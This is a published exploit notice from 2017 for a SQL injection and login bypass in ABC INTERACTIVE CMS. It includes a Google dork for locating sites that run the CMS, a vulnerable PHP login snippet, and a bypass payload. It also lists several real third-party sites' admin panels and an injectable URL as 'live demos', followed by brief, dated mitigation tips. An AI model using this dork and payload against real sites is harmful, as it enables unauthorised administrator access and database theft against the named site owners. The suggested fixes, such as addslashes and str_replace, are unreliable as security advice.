# Exploit Title : ABC INTERACTIVE CMS Bypass & SQL Injection
# Google Dork : intext:"Web Design & code: ABC INTERACTIVE"
# Discovered By : MrHoudini
# Contact Me : Mr.Houdini77@Gmail.com
# My WebSite: www.MrHoudini.ir
# Date : 9-5-2017
# Vendor Homepage : https://www.abcinteractive.it
[!] Description.:
SQL injection attacks usually targets database and all of them are the results of programming errors.
If programmer couldn't checked the inputs correctly, so the attacker can send his/her commands to database.
If programmer do this errors at admin page input and the inputs haven't been checked correctly,
occur a very bad thing that allow attacker login to administrator panel
with combination the passwords that turn the result to True in php.
Request Method :
[+] POST
Vulnerable Module:
[+] Login
Vulnerable Parameter:
[+](username) and (Password)
==================================================
[!] Bug.........:
<?php
require_once('any.php');
if($_POST['submit'])
{
$user=$_POST['user'];
$pswd=$_POST['pswd'];
$result=mysql_query("select * from login where user='$user' and pswd='$pswd'");
$rowcount=mysql_num_rows($result);
if($rowcount>0)
{
header('Location:any.php');
}
else
{
echo "bad user";
}
}
?>
==================================================
[!] PoC.........:
To bypass the admin login: '= 'or'
==================================================
[!] Live Demo. For Admin Page :
http://www.matericum.com/controlPanel/html/
https://www.abcinteractive.it/controlPanel/
http://www.agencylab.it/controlPanel/html/
Url Target Admin Panel : http://site.com/controlPanel/html/
[!] Live Demo. For SQL Injection :
http://www.matericum.com/essenza.php?id=10
==================================================
[!] Solution...:
PHP functions can be averted with the bug
Check input variable:
--ctype_digit
--ctype_alnum
And other ctype & gettype family functions
*String entries with the database functions
--mysql_real_escape_string or sqlite_escape_string or ....
-If functions are not available in the database
--str_replace , addslashes